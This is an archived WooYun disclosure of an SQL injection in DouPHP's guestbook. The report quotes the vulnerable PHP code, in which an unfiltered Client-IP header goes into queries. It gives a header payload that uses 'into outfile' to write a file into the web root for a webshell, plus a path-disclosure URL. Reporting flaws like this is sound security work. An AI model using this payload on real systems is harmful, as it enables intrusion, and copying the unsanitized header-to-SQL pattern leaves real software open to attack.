乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-04: 细节已通知厂商并且等待厂商处理中 2014-07-09: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-09-02: 细节向核心白帽子及相关领域专家公开 2014-09-12: 细节向普通白帽子公开 2014-09-22: 细节向实习白帽子公开 2014-09-29: 细节向公众公开
注入
依然是get_ip的问题,guestbook.php:102行
if ($rec == 'insert'){ /* 跨站请求伪造CSRF的防御 */ if ($firewall->check_token($_POST['token'])) { /* html安全过滤器 */ $_POST = $firewall->dou_filter($_POST); $ip = $dou->get_ip(); $add_time = time(); $vcode = $check->is_captcha($_POST['vcode']) ? strtoupper($_POST['vcode']) : ''; /* 检查IP是否频繁留言 */ if(is_water($ip)) $dou->dou_msg($_LANG['guestbook_is_water'], $url); /* 如果限制必须输入中文则修改错误提示 */ $include_chinese = $_CFG['guestbook_check_chinese'] ? $_LANG['guestbook_include_chinese'] : ''; /* 验证主题 */ if (!$check->guestbook($_POST['title'], 70)) { $wrong['title'] = preg_replace('/d%/Ums', $include_chinese, $_LANG['guestbook_title_wrong']); } /* 验证联系人 */ if (!$check->guestbook($_POST['name'], 30)) { $wrong['name'] = preg_replace('/d%/Ums', $include_chinese, $_LANG['guestbook_name_wrong']); } /* 验证回复方式 */ if (empty($_POST['contact_type'])) { $wrong['contact'] = $_LANG['guestbook_contact_type_empty']; } elseif (stripos($_POST['contact_type'], 'mail')) { if(!$check->is_email($_POST['contact'])) $wrong['contact'] = $_LANG['guestbook_email_wrong']; } else { if(!$check->is_number($_POST['contact'])) { stripos($_POST['contact_type'], 'qq') ? $wrong['contact'] = $_LANG['guestbook_qq_wrong'] : $wrong['contact'] = $_LANG['guestbook_tel_wrong']; } } /* 验证留言内容 */ if (!$check->guestbook($_POST['content'], 300)) { $wrong['content'] = preg_replace('/d%/Ums', $include_chinese, $_LANG['guestbook_content_wrong']); } /* 判断验证码 */ if($_CFG['captcha'] && md5($vcode . DOU_SHELL) != $_SESSION['captcha']) { $wrong['vcode'] = $_LANG['captcha_wrong']; } if($wrong) { $_SESSION['wrong'] = $wrong; $_SESSION['post'] = $_POST; header('Location: ' . $url); exit(); } else { $sql = "INSERT INTO " . $dou->table('guestbook') . " (id, title, name, contact_type, contact, content, ip, add_time)" . " VALUES (NULL, '$_POST[title]', '$_POST[name]', '$_POST[contact_type]', '$_POST[contact]', '$_POST[content]', '$ip', '$add_time')"; $dou->query($sql); $dou->dou_msg($_LANG['guestbook_insert_success'], $url); } } else { /* CSRF非法操作提示 */ $dou->dou_msg($_LANG['illegal'], $url); }}/** +---------------------------------------------------------- * 防灌水 +---------------------------------------------------------- */function is_water($ip){ $unread_messages = $GLOBALS['dou']->get_one("SELECT COUNT(*) FROM " . $GLOBALS['dou']->table('guestbook') . " WHERE ip = '$ip' AND if_read = '0'"); /* 如果管理员未回复的留言数量大于3 */ if ($unread_messages >= '3') return true;}
基于ip判断是否灌水,同时$ip无过滤带入select查询include/common.class.php:122行
function get_ip() { static $ip; if (isset ($_SERVER)) { if (isset ($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else if (isset ($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); } else if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } else { $ip = getenv("REMOTE_ADDR"); } } return $ip; }
ip可以从Client-ip获得,并且毫无过滤
如果当前数据库用户具有写权限,配合爆路径还可以getshell,
http://localhost/DouPHP/upload/include/smarty/Smarty_Compiler.class.php
Client-ip: 127.0.0.1' union select version() into outfile 'C:/AppServ/www/DouPHP/upload/test.php'#
x
危害等级:无影响厂商忽略
忽略时间:2014-09-29 18:26
2014-07-11:已经修正,感谢反馈!